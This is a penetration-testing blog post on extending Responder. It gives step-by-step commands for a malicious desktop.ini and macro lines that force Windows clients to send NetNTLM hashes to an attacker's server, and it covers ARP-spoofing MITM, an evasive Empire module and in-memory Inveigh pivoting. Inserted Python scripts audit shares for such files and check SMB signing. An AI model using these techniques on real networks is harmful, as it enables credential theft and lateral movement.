A blog about generally interesting infosec stuff by employees of SecQuest Information Security https://www.secquest.co.uk

Tuesday, 10 July 2018

From Intermediate Responder to Advanced - Expanding the Suite

In our previous article we covered the tool Responder, and how to maximise its effectiveness by using the whole suite of tools and options provided to you. Responder is an incredibly useful network exploit tool and can be extremely powerful when LLMNR/NBNS are on and SMB signing is off. In this article, we will cover how to expand Responder's functionality using other tools in conjunction with it.
If you are not familiar with Responder already, we recommend you learn the basics and read our intermediate guide here: From Beginner Responder to Intermediate – Utilising the Whole Suite.

Expanding the Suite – Application Specific

When targeting specific applications you can increase the effectiveness of Responder significantly. For example, if you find a writeable SMB share on a network that is heavily used by clients and admins, you can utilise that share against the network with Responder. To do so you must first craft a malicious Desktop.ini file. Instructions are below:

Create the Desktop.ini file:
a. Open a PowerShell window.
b. Run mkdir <directory name>.
c. Run attrib +s <directory name>.
d. Enter the directory.
e. Run echo [.ShellClassInfo] > desktop.ini.
f. Run:
   i.  For Windows Vista victim and above: echo IconResource=\\<Responder server IP>\directory >> desktop.ini.
   ii. For Windows XP victim: echo IconFile=\\<Responder server IP>\directory >> desktop.ini.
g. Run attrib +s +h desktop.ini.

Check the contents of the file look like:
[.ShellClassInfo]
IconResource=\\<Responder server IP>\directory

Once this is complete, you can place the desktop.ini file and the folder in which it is contained onto the writeable share. Any Windows clients connecting to the share with Windows Explorer will automatically attempt to resolve the icon of the folder; this will lead to a login attempt to your SMB module in Responder. If Responder is running and you have set the destination IP address correctly in the desktop.ini file you will be able to harvest the NetNTLM hash of anyone browsing to this SMB share. You can pair this technique with MultiRelay (usage discussed in previous article) for maximum effect, if domain admins use this share and SMB signing is off on the domain controller you will find it easy to conquer the entire network. If this is not the case, you will be able to use this to gain significant lateral spread and harvest some hashes for cracking while you are at it. Hash grabbing will work across subnets with this method. Shown below is an example of what the exploited SMB share should look like once you drop your malicious directory with desktop.ini inside.


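A defender auditing a shared folder for the pattern just described can parse desktop.ini files directly. The script below is an added example, not SecQuest's or Responder's code: it walks a directory tree (for instance a share mounted locally), reads each desktop.ini (decoding the UTF-16 with BOM that Windows PowerShell's > redirection writes), and reports any IconResource or IconFile entry under [.ShellClassInfo] that points at a UNC host outside an allow list. The folder names, the host name fileserver01 and the 192.0.2.10 address in the constructed sample are assumptions made for the demonstration.

```python
"""Audit a directory tree (e.g. a mounted SMB share) for desktop.ini files whose
folder-icon entries point at a UNC path. Added example; not SecQuest's code."""
import os
import re
import shutil
import tempfile

# Keys the shell follows to load a folder icon: IconResource (Vista+) and IconFile (XP).
ICON_KEYS = {"iconresource", "iconfile"}
# \\host\share or //host/share; Explorer treats both separator styles as a UNC path.
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/\s]+)(?:[\\/]|$)")


def parse_icon_refs(text):
    """Return (key, host, value) for every icon entry under [.ShellClassInfo]
    whose value is a UNC path. Entries outside that section are ignored."""
    findings, section = [], None
    for raw in text.splitlines():
        line = raw.lstrip("\ufeff").strip()   # drop a UTF-8 BOM if one survived decoding
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != ".shellclassinfo" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().lower(), value.strip()
        if key in ICON_KEYS:
            m = UNC_RE.match(value)
            if m:
                findings.append((key, m.group(1), value))
    return findings


def read_ini(path):
    """Windows PowerShell's '>' redirection writes UTF-16LE with a BOM, so decode by BOM."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8", errors="replace")


def scan_tree(root, trusted_hosts=()):
    """Walk root and report desktop.ini icon references to hosts outside trusted_hosts."""
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "desktop.ini":
                continue
            path = os.path.join(dirpath, name)
            for key, host, value in parse_icon_refs(read_ini(path)):
                if host.lower() not in trusted:
                    hits.append({"path": path, "key": key, "host": host, "value": value})
    return hits


def demo():
    """Build a constructed share layout with one benign and one suspicious desktop.ini
    and return the scan findings. All names and addresses here are made up."""
    root = tempfile.mkdtemp(prefix="share_")
    try:
        benign = os.path.join(root, "Templates")
        suspicious = os.path.join(root, "Reports")
        os.makedirs(benign)
        os.makedirs(suspicious)
        # Benign: icon taken from a local system DLL.
        with open(os.path.join(benign, "desktop.ini"), "w", encoding="utf-8") as fh:
            fh.write("[.ShellClassInfo]\nIconResource=%SystemRoot%\\system32\\SHELL32.dll,3\n")
        # Suspicious: icon on an unknown host, written as UTF-16 with BOM like PowerShell would.
        with open(os.path.join(suspicious, "desktop.ini"), "w", encoding="utf-16") as fh:
            fh.write("[.ShellClassInfo]\nIconResource=\\\\192.0.2.10\\directory\n")
        return scan_tree(root, trusted_hosts=["fileserver01"])
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for hit in demo():
        print("%(path)s: %(key)s -> %(host)s (%(value)s)" % hit)
```

The allow list matters because legitimate folder customisations can reference icons on a corporate file server; the finding of interest is an icon hosted on a machine nobody expects. Running scan_tree against the root of a mounted share on a schedule and alerting on new hits is a cheap control for the technique described above.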
Another example of an application specific attack would be using Microsoft Office macros. To create a malicious macro which will connect to your Responder server enter this VBS code into the macro:
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//<Responder server IP>/directory", 1)
You can then spread this Microsoft Office file however you see fit; if you can get an admin to open it you may be able to escalate your privileges, or at least gain lateral spread and some more hashes for cracking!
These methods will also work across subnets, unlike LLMNR/NBNS hash grabbing in most scenarios. Responder naturally relies upon LLMNR and/or NBNS to direct victims to its fake servers for hash grabbing. These two protocols only operate within a single subnet (broadcast domain). By shedding reliance upon these protocols, we allow for hashes to be grabbed across subnets.
There are of course other application specific methods you can utilise; in general if you can force Windows to connect to Responder with NTLMSSP you will be able to get a hash as Windows will automatically hand over credentials. Methods such as the file:// resource locator in HTML are disabled in modern browsers, but there are plenty of other methods. This article: https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ contains an impressive list of methods you could utilise against your target network. It also deserves credit for being my original inspiration for the desktop.ini method and has provided the creation steps for the two malicious files above.

Expanding the Suite – ARP Spoofing

Whilst Responder is a powerful tool, it generally sits waiting for victims to connect to it. This slows an attack down a great deal, especially when targeting a specific machine. Additionally, Responder is unable to intercept correctly resolved SMB connections; it can only intercept connections that are preceded by LLMNR/NBNS broadcasts. If you are in a scenario where two SMB servers are syncing with each other using their Administrator accounts and you are aware of this, Responder would normally be unable to help you MITM this connection. With some extra help from an ARP spoofing attack this is possible!
The article at http://g-laurent.blogspot.com/2016/10/introducing-responder-multirelay-10.html contains a brief description of how to utilise ARP spoofing with Responder to MITM the aforementioned scenario. Laurent Gaffie's blog is a good source of information on Responder in general, should you require an explanation of the basics.
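The MITM and relay scenarios above depend on the condition named at the start of the article: SMB signing being off on the server side. The following is an added example, not Responder's or SecQuest's code, for checking that condition passively from a packet capture. It parses an SMB2 NEGOTIATE response as it appears on TCP 445 (NetBIOS session framing followed by the 64-byte SMB2 header) and reads the SecurityMode flags defined in MS-SMB2 (0x01 signing enabled, 0x02 signing required). build_negotiate_response is a helper that constructs test frames offline; fields the parser does not read are filled with zeros or nominal values, so the constructed frames are samples, not captures.

```python
"""Passive check of an SMB2 NEGOTIATE response for the server's signing posture.
Added example; not part of the article or of Responder."""
import struct

SMB2_PROTOCOL_ID = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000                  # Command field value for NEGOTIATE
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001  # Flags bit set on every response
SIGNING_ENABLED = 0x0001                 # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002                # SMB2_NEGOTIATE_SIGNING_REQUIRED
DIALECTS = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}


def parse_negotiate_response(frame):
    """Parse a NetBIOS-session-framed SMB2 NEGOTIATE response (as captured on TCP 445)."""
    if len(frame) < 4 + 64 + 64 or frame[0] != 0x00:
        raise ValueError("not a complete NetBIOS session message carrying SMB2")
    nb_len = int.from_bytes(frame[1:4], "big")
    smb = frame[4:4 + nb_len]
    if smb[:4] != SMB2_PROTOCOL_ID:
        raise ValueError("not SMB2 (an SMB1-only server answers with \\xffSMB)")
    hdr_size, = struct.unpack_from("<H", smb, 4)
    command, = struct.unpack_from("<H", smb, 12)
    flags, = struct.unpack_from("<I", smb, 16)
    if hdr_size != 64 or command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    # Response body follows the 64-byte header: StructureSize(2) SecurityMode(2) DialectRevision(2) ...
    struct_size, sec_mode, dialect = struct.unpack_from("<HHH", smb, 64)
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize %d" % struct_size)
    return {
        "dialect": DIALECTS.get(dialect, "0x%04x" % dialect),
        "signing_enabled": bool(sec_mode & SIGNING_ENABLED),
        "signing_required": bool(sec_mode & SIGNING_REQUIRED),
    }


def signing_verdict(frame):
    """Return the parsed fields plus a one-line verdict for an audit report."""
    info = parse_negotiate_response(frame)
    if info["signing_required"]:
        info["verdict"] = "OK: server requires signing"
    elif info["signing_enabled"]:
        info["verdict"] = "EXPOSED: signing enabled but not required; unsigned sessions accepted"
    else:
        info["verdict"] = "EXPOSED: signing disabled"
    return info


def build_negotiate_response(security_mode, dialect=0x0302):
    """Construct a minimal NEGOTIATE response for offline testing (constructed, not a capture).
    Layout follows MS-SMB2; fields the parser does not read are zero or nominal."""
    header = struct.pack(
        "<4sHHIHHIIQIIQ16s",
        SMB2_PROTOCOL_ID, 64, 0, 0,        # ProtocolId, StructureSize, CreditCharge, Status
        SMB2_NEGOTIATE, 1,                 # Command, CreditResponse
        SMB2_FLAGS_SERVER_TO_REDIR, 0,     # Flags, NextCommand
        0, 0, 0, 0,                        # MessageId, Reserved, TreeId, SessionId
        b"\x00" * 16,                      # Signature
    )
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65, security_mode, dialect, 0,     # StructureSize, SecurityMode, DialectRevision, NegotiateContextCount
        b"\x00" * 16,                      # ServerGuid
        0, 65536, 65536, 65536,            # Capabilities, MaxTransactSize, MaxReadSize, MaxWriteSize
        0, 0,                              # SystemTime, ServerStartTime
        128, 0, 0,                         # SecurityBufferOffset, SecurityBufferLength, NegotiateContextOffset
    ) + b"\x00"                            # one-byte Buffer (empty security blob)
    payload = header + body
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


if __name__ == "__main__":
    for mode in (0x00, SIGNING_ENABLED, SIGNING_ENABLED | SIGNING_REQUIRED):
        print(signing_verdict(build_negotiate_response(mode)))
```

Domain controllers require signing by default; member servers and workstations only enable it, which is the posture the second verdict reports. A server that merely enables signing will still accept an unsigned session, so the check belongs in a build baseline for every server that holds anything worth protecting, not just the domain controllers.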

Expanding the Suite – Your Own Code

The Responder tool is under a GPL v3 license, which means you can do just about anything with the code so long as you ship it with the license and provide credit. For more details read this page: https://github.com/lgandx/Responder/blob/master/LICENSE. Thanks to this generous license we can take, adjust and use the Responder code as we see fit.
For example, I have adjusted the Responder code to work with Empire as a credential extraction module. The module takes the IP address of the Empire server as an argument and uses it to force the victim to connect back to Responder. You might assume that this is essentially redundant thanks to tools like Mimikatz; however, the main advantage of this module is that it does not require any privileged access, appears on the network as legitimate traffic and is virtually undetectable by AntiVirus as it is all standard Windows operation. By tricking Windows into handing over the NetNTLM hash for us we can still gather hashes for lateral spread and cracking when we don't have any privileges on our target machine. Installation is as easy as dropping the data and lib directories into the directory of your Empire installation. You can find the module here: https://www.secquest.co.uk/tools/HashGrabModule.zip
Since you can adapt and use the Responder code for your own purposes, advanced users will find that Responder is incredibly flexible. Responder's LLMNR and NBNS spoofing code could be utilised in a different application for example, or one of the individual servers could be used in something like the custom Empire module presented above.

Expanding the Suite – PowerShell and Pivoting

Responder itself can be used to pivot into target networks using the technique described here: https://ijustwannared.team/2017/05/27/responder-and-layer-2-pivots/. But if you already have access to PowerShell on a victim, you can use that victim to pivot your LLMNR and NBNS attacks into the target network. Inveigh is a tool much like Responder and is controlled in a very similar manner; however, Inveigh is written in PowerShell instead of Python. This makes Inveigh an excellent choice for pivoting into Windows networks. Using IEX (Invoke-Expression), Inveigh can be downloaded directly into memory on the target machine and executed with a single command.
Inveigh can be found here: https://github.com/Kevin-Robertson/Inveigh
An excellent list of different ways to download Inveigh to a machine can be found here: https://gist.github.com/HarmJ0y/bb48307ffa663256e239
Inveigh operates in a very similar manner to Responder, and should be simple to use if you already know how to use Responder. It is worth bearing in mind that Inveigh has support for both privileged and unprivileged execution modes. If you have gained access to a machine under an unprivileged user, you may be able to use Inveigh to escalate your privileges. In conjunction with the application specific methods listed above, Inveigh pivoting can be a powerful and stealthy method of privilege escalation.

Summary

As you can see, Responder can become an extremely flexible and powerful tool when used to its full potential. Our intermediate guide covered the usage of what was provided, and this article has covered how you can expand upon those tools. By no means are the above the only ways to expand Responder; I highly encourage you to seek out your own methods. If you discover any new and interesting ways of adapting Responder to a specific network I would love to hear about them. Additionally, if you have any questions regarding Responder I would be happy to answer them; you can contact me at: lewis@secquest.co.uk.
